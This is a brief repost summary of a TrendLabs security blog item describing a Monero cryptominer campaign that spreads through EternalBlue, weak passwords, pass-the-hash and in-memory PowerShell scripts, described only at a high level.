Top

Miner Malware Spreads Beyond China, Uses Multiple Propagation Methods Including EternalBlue, Powershell Abuse - TrendLabs Security Intelligence Blog

Miner Malware Spreads Beyond China, Uses Multiple Propagation Methods Including EternalBlue, Powershell Abuse - TrendLabs Security Intelligence Blog

  • We detected a malware that uses multiple propagation and infection methods to drop a Monero cryptocurrency miner onto as many systems and servers as possible.
  • Initially observed in China in early 2019, the methods it previously used to infect networks involved accessing weak passwords and using pass-the-hash technique, Windows admin tools, and brute force attacks with publicly available codes.
  • Once a machine is infected via one of the methods, the malware acquires the MAC address and collects information on the anti-virus products installed in the machine.
  • It leverages weak passwords in computer systems and databases, targets legacy software that companies may still be using, uses PowerShell-based scripts with components downloaded and executed in memory, exploits unpatched vulnerabilities, and installs using the Windows startup folder and the task scheduler.
  • The post Miner Malware Spreads Beyond China, Uses Multiple Propagation Methods Including EternalBlue, Powershell Abuse appeared first on .


Share it
Top
To Top